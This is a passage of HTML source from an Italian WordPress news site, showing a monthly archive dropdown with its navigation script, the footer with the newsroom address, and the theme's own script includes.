	<option value='https://www.ilmeridianonews.it/2019/01/'> Gennaio 2019 &nbsp;(828)</option>
	<option value='https://www.ilmeridianonews.it/2018/12/'> Dicembre 2018 &nbsp;(619)</option>
	<option value='https://www.ilmeridianonews.it/2018/11/'> Novembre 2018 &nbsp;(677)</option>
	<option value='https://www.ilmeridianonews.it/2018/10/'> Ottobre 2018 &nbsp;(754)</option>
	<option value='https://www.ilmeridianonews.it/2018/09/'> Settembre 2018 &nbsp;(608)</option>
	<option value='https://www.ilmeridianonews.it/2018/08/'> Agosto 2018 &nbsp;(398)</option>
	<option value='https://www.ilmeridianonews.it/2018/07/'> Luglio 2018 &nbsp;(682)</option>
	<option value='https://www.ilmeridianonews.it/2018/06/'> Giugno 2018 &nbsp;(731)</option>
	<option value='https://www.ilmeridianonews.it/2018/05/'> Maggio 2018 &nbsp;(789)</option>
	<option value='https://www.ilmeridianonews.it/2018/04/'> Aprile 2018 &nbsp;(686)</option>
	<option value='https://www.ilmeridianonews.it/2018/03/'> Marzo 2018 &nbsp;(798)</option>
	<option value='https://www.ilmeridianonews.it/2018/02/'> Febbraio 2018 &nbsp;(698)</option>
	<option value='https://www.ilmeridianonews.it/2018/01/'> Gennaio 2018 &nbsp;(647)</option>
	<option value='https://www.ilmeridianonews.it/2017/12/'> Dicembre 2017 &nbsp;(684)</option>
	<option value='https://www.ilmeridianonews.it/2017/11/'> Novembre 2017 &nbsp;(714)</option>
	<option value='https://www.ilmeridianonews.it/2017/10/'> Ottobre 2017 &nbsp;(668)</option>
	<option value='https://www.ilmeridianonews.it/2017/09/'> Settembre 2017 &nbsp;(696)</option>
	<option value='https://www.ilmeridianonews.it/2017/08/'> Agosto 2017 &nbsp;(478)</option>
	<option value='https://www.ilmeridianonews.it/2017/07/'> Luglio 2017 &nbsp;(783)</option>
	<option value='https://www.ilmeridianonews.it/2017/06/'> Giugno 2017 &nbsp;(795)</option>
	<option value='https://www.ilmeridianonews.it/2017/05/'> Maggio 2017 &nbsp;(805)</option>
	<option value='https://www.ilmeridianonews.it/2017/04/'> Aprile 2017 &nbsp;(806)</option>
	<option value='https://www.ilmeridianonews.it/2017/03/'> Marzo 2017 &nbsp;(821)</option>
	<option value='https://www.ilmeridianonews.it/2017/02/'> Febbraio 2017 &nbsp;(606)</option>
	<option value='https://www.ilmeridianonews.it/2017/01/'> Gennaio 2017 &nbsp;(642)</option>
	<option value='https://www.ilmeridianonews.it/2016/12/'> Dicembre 2016 &nbsp;(593)</option>
	<option value='https://www.ilmeridianonews.it/2016/11/'> Novembre 2016 &nbsp;(608)</option>
	<option value='https://www.ilmeridianonews.it/2016/10/'> Ottobre 2016 &nbsp;(505)</option>
	<option value='https://www.ilmeridianonews.it/2016/09/'> Settembre 2016 &nbsp;(538)</option>
	<option value='https://www.ilmeridianonews.it/2016/08/'> Agosto 2016 &nbsp;(335)</option>
	<option value='https://www.ilmeridianonews.it/2016/07/'> Luglio 2016 &nbsp;(599)</option>
	<option value='https://www.ilmeridianonews.it/2016/06/'> Giugno 2016 &nbsp;(589)</option>
	<option value='https://www.ilmeridianonews.it/2016/05/'> Maggio 2016 &nbsp;(669)</option>
	<option value='https://www.ilmeridianonews.it/2016/04/'> Aprile 2016 &nbsp;(641)</option>
	<option value='https://www.ilmeridianonews.it/2016/03/'> Marzo 2016 &nbsp;(659)</option>
	<option value='https://www.ilmeridianonews.it/2016/02/'> Febbraio 2016 &nbsp;(535)</option>
	<option value='https://www.ilmeridianonews.it/2016/01/'> Gennaio 2016 &nbsp;(474)</option>
	<option value='https://www.ilmeridianonews.it/2015/12/'> Dicembre 2015 &nbsp;(557)</option>
	<option value='https://www.ilmeridianonews.it/2015/11/'> Novembre 2015 &nbsp;(389)</option>
	<option value='https://www.ilmeridianonews.it/2015/10/'> Ottobre 2015 &nbsp;(346)</option>
	<option value='https://www.ilmeridianonews.it/2015/09/'> Settembre 2015 &nbsp;(311)</option>
	<option value='https://www.ilmeridianonews.it/2015/08/'> Agosto 2015 &nbsp;(144)</option>
	<option value='https://www.ilmeridianonews.it/2015/07/'> Luglio 2015 &nbsp;(263)</option>
	<option value='https://www.ilmeridianonews.it/2015/06/'> Giugno 2015 &nbsp;(206)</option>
	<option value='https://www.ilmeridianonews.it/2015/05/'> Maggio 2015 &nbsp;(253)</option>
	<option value='https://www.ilmeridianonews.it/2015/04/'> Aprile 2015 &nbsp;(257)</option>
	<option value='https://www.ilmeridianonews.it/2015/03/'> Marzo 2015 &nbsp;(241)</option>
	<option value='https://www.ilmeridianonews.it/2015/02/'> Febbraio 2015 &nbsp;(233)</option>
	<option value='https://www.ilmeridianonews.it/2015/01/'> Gennaio 2015 &nbsp;(204)</option>
	<option value='https://www.ilmeridianonews.it/2014/12/'> Dicembre 2014 &nbsp;(194)</option>
	<option value='https://www.ilmeridianonews.it/2014/11/'> Novembre 2014 &nbsp;(237)</option>
	<option value='https://www.ilmeridianonews.it/2014/10/'> Ottobre 2014 &nbsp;(226)</option>
	<option value='https://www.ilmeridianonews.it/2014/09/'> Settembre 2014 &nbsp;(199)</option>
	<option value='https://www.ilmeridianonews.it/2014/08/'> Agosto 2014 &nbsp;(79)</option>
	<option value='https://www.ilmeridianonews.it/2014/07/'> Luglio 2014 &nbsp;(188)</option>
	<option value='https://www.ilmeridianonews.it/2014/06/'> Giugno 2014 &nbsp;(200)</option>
	<option value='https://www.ilmeridianonews.it/2014/05/'> Maggio 2014 &nbsp;(223)</option>
	<option value='https://www.ilmeridianonews.it/2014/04/'> Aprile 2014 &nbsp;(207)</option>
	<option value='https://www.ilmeridianonews.it/2014/03/'> Marzo 2014 &nbsp;(239)</option>
	<option value='https://www.ilmeridianonews.it/2014/02/'> Febbraio 2014 &nbsp;(229)</option>
	<option value='https://www.ilmeridianonews.it/2014/01/'> Gennaio 2014 &nbsp;(239)</option>
	<option value='https://www.ilmeridianonews.it/2013/12/'> Dicembre 2013 &nbsp;(230)</option>
	<option value='https://www.ilmeridianonews.it/2013/11/'> Novembre 2013 &nbsp;(253)</option>
	<option value='https://www.ilmeridianonews.it/2013/10/'> Ottobre 2013 &nbsp;(244)</option>
	<option value='https://www.ilmeridianonews.it/2013/09/'> Settembre 2013 &nbsp;(231)</option>
	<option value='https://www.ilmeridianonews.it/2013/08/'> Agosto 2013 &nbsp;(111)</option>
	<option value='https://www.ilmeridianonews.it/2013/07/'> Luglio 2013 &nbsp;(194)</option>
	<option value='https://www.ilmeridianonews.it/2013/06/'> Giugno 2013 &nbsp;(253)</option>
	<option value='https://www.ilmeridianonews.it/2013/05/'> Maggio 2013 &nbsp;(150)</option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-6" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			</section>                            
                                                            <section id="bd-aboutme-widget-4" class="bd-aboutme-widget widget widget-area-first widget-footer">
        
                    <div class="about-me-text">Sede della Redazione: Sede della redazione Via Roma n°47<br>Giugliano in Campania <br><b>Email:</b><a href="mailto:redazione@ilmeridianonews.it">redazione@ilmeridianonews.it</a></div>
        

        
        </section>                            
                                                                </div>
                </div><!-- .container-main -->
            </div><!-- .bdayh-wrap -->
        </footer>
    <!-- #footer -->

            <div class="cf"></div>
        <div id="footer-bottom" class="footer-bottom">
            <div class="bdayh-wrap">
                <div class="bdayh-inner">

                                            <div class="footer-left">
                            Copyright © 2020 - Il Meridiano News - <a href=" https://www.ilmeridianonews.it/privacy/">Privacy Policy</a>                        </div>
                    <!-- .footer-left-->

                    <!-- .footer-right-->

                </div>
            </div>
        </div>
    <!-- #footer-bottom -->
    </div><!-- .inner-wrapper -->
</div><!-- #page -->
</div><!-- .page-outer -->

    <i id="go-top" class="fa fa-angle-up"></i>

    <div id="reading-position-indicator"></div>

<script>
</script><script type='text/javascript' id='adrotate-clicktracker-js-extra'>
/* <![CDATA[ */
var click_object = {"ajax_url":"https:\/\/www.ilmeridianonews.it\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/plugins/adrotate-pro/library/jquery.adrotate.clicktracker.js' id='adrotate-clicktracker-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/plugins/sg-cachepress/assets/js/lazysizes.min.js' id='siteground-optimizer-lazy-sizes-js-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/themes/magic-mag/js/all-min.js' id='bd-all-main-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/themes/magic-mag/js/sticky-min.js' id='bd-sticky-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/themes/magic-mag/js/scripts.js' id='bdayhScripts-js'></script>
<script type='text/javascript' id='bd-main-js-extra'>
/* <![CDATA[ */
var bd = {"is_singular":"1","post_reading_position_indicator":"","sticky_sidebar":"1","imgScroll":"","lang_no_results":"No Results","lang_results_found":"Results Found"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/themes/magic-mag/js/main.js' id='bd-main-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-content/themes/magic-mag/js/jquery.flexslider-min.js' id='flex-slider-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-includes/js/wp-embed.min.js' id='wp-embed-js'></script>


</body>
</html>